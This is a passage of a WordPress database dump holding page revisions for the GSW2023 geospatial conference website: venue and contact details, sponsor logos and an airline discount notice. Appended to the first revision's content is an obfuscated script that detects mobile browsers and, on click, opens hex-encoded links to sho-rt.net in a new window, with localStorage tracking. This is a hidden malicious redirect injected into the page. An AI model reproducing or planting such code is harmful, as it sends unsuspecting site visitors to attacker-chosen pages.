read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:52:10','2023-06-18 13:52:10','',3066,'https://gsw2023.com/?p=4713',0,'revision','',0),
(4714,1,'2023-06-18 13:52:37','2023-06-18 13:52:37','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 